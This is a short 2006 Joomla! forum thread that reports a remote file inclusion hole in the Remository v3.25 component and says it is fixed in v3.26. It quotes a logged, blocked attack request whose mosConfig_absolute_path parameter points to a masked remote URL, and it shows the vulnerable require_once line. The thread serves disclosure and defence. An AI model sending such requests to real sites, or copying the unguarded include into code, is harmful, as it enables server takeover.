It is currently Sun Jul 20, 2008 10:51 am

Remository v3.25 vulnerability

For all Non-Joomla! security issues. ie 3pd Components etc.

Moderators: Beat, rliskey, RussW, General Support Moderators

Post a reply

Remository v3.25 vulnerability

Postby kmekc on Fri Sep 01, 2006 11:14 am

64.6.15.28 - - [31/Aug/2006:17:01:25 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://xxxxxxxxxxx/xxxxxx/xxxxxx HTTP/1.1" 403 27

As i looked into admin.remository.php:

Code: Select all
require_once ($mosConfig_absolute_path.'/components/com_remository/com_remository_constants.php');

// Don't allow direct linking
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );


Fixed in v3.26
Last edited by kmekc on Mon Sep 18, 2006 12:22 pm, edited 1 time in total.
kmekc
Joomla! Apprentice
Joomla! Apprentice
 
Posts: 46
Joined: Fri Sep 01, 2006 8:04 am
Location: Berlin
Top

Re: Remository v3.25 vulnerability

Postby kmekc on Fri Sep 01, 2006 11:17 am

Oh now found the thread where this one has already posted :)

But Remository is also not in the official vulnerability list
kmekc
Joomla! Apprentice
Joomla! Apprentice
 
Posts: 46
Joined: Fri Sep 01, 2006 8:04 am
Location: Berlin
Top
Post a reply

Return to 3rd Party/Non Joomla! Security Issues

Who is online

Users browsing this forum: No registered users and 0 guests